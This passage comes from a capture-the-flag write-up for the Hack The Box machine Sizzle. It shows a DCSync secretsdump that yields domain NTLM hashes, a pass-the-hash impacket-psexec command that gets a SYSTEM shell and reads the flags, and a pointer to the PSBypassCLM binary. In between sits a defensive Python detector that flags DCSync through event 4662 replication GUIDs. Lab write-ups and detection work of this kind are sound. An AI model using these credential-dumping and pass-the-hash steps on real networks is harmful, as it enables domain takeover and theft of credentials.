[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:1797d4bb27f59619665045685d5bb21a:::
[*] Kerberos keys grabbed
[*] Cleaning up...
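The DRSUAPI method secretsdump reports above is the replication call DCSync relies on, and on the domain controller it leaves Security event 4662 with the replication control-access GUIDs in the Properties field (Directory Service Access auditing must be on for these to be logged). As an added example (not from the writeup), this Python script filters constructed 4662 records in a flattened key=value layout and reports replication requests from any subject that is not a domain-controller computer account:

```python
import re

# Control-access-right GUIDs for directory replication; fixed values from the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

FIELD_RE = re.compile(r"(\w+)=([^;]*)")
GUID_RE = re.compile(r"\{([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}")


def parse_event(line):
    """Turn one 'Key=value; Key=value' record into a dict plus a set of GUIDs."""
    fields = {k: v.strip() for k, v in FIELD_RE.findall(line)}
    fields["guids"] = {g.lower() for g in GUID_RE.findall(fields.get("Properties", ""))}
    return fields


def dcsync_candidates(lines, dc_accounts):
    """4662 events that exercise replication rights from a non-DC subject."""
    dcs = {a.lower() for a in dc_accounts}
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = sorted(REPLICATION_RIGHTS[g] for g in ev["guids"] if g in REPLICATION_RIGHTS)
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.lower() in dcs:
            continue   # DC-to-DC replication is normal traffic
        hits.append({"time": ev.get("TimeCreated"), "subject": subject,
                     "domain": ev.get("SubjectDomainName"), "rights": rights})
    return hits


# Constructed sample records (not real exported logs); SIZZLE$ is the only DC here.
SAMPLE_EVENTS = [
    "TimeCreated=2023-03-21T21:15:02Z; EventID=4662; SubjectUserName=SIZZLE$; "
    "SubjectDomainName=HTB; ObjectType=domainDNS; AccessMask=0x100; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "TimeCreated=2023-03-21T21:16:40Z; EventID=4662; SubjectUserName=mrlky; "
    "SubjectDomainName=HTB; ObjectType=domainDNS; AccessMask=0x100; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
    "{89e95b76-444d-4c62-991a-0facbeda640c}",
    "TimeCreated=2023-03-21T21:17:05Z; EventID=4662; SubjectUserName=amanda; "
    "SubjectDomainName=HTB; ObjectType=user; AccessMask=0x10; "
    "Properties={00000000-0000-0000-0000-00000000aaaa}",   # unrelated, made-up GUID
    "TimeCreated=2023-03-21T21:18:00Z; EventID=4624; SubjectUserName=mrlky; "
    "SubjectDomainName=HTB; LogonType=3",
]

if __name__ == "__main__":
    for hit in dcsync_candidates(SAMPLE_EVENTS, dc_accounts=["SIZZLE$"]):
        print(f"{hit['time']} {hit['domain']}\\{hit['subject']} used {', '.join(hit['rights'])}")
```

Only the mrlky request is reported; the same replication rights that BloodHound surfaced for that user are what the alert keys on, so removing them from non-DC principals both closes the path and keeps this rule quiet.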

As we have the NTLM hash of the Administrator user, we can pass the hash and get a shell as nt authority\system. Then all that is left is to collect both the user and root flags.

impacket-psexec htb.local/administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file ftRDykyJ.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service zRZi on 10.10.10.103.....
[*] Starting service zRZi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type \users\mrlky\desktop\user.txt
168224d790f5c7ef7113300aeceb7e9d

C:\Windows\system32> type \users\administrator\desktop\root.txt
83db2d37e4884fb0beadde14a9d025b7

The PsBypassCLM.exe binary used in the privilege escalation section comes from the PSByPassCLM tool. Clone the repository; the compiled binary is under PSBypassCLM/PSBypassCLM/bin/x64/Debug, which is the directory to serve with the simple HTTP server.

PSByPassCLM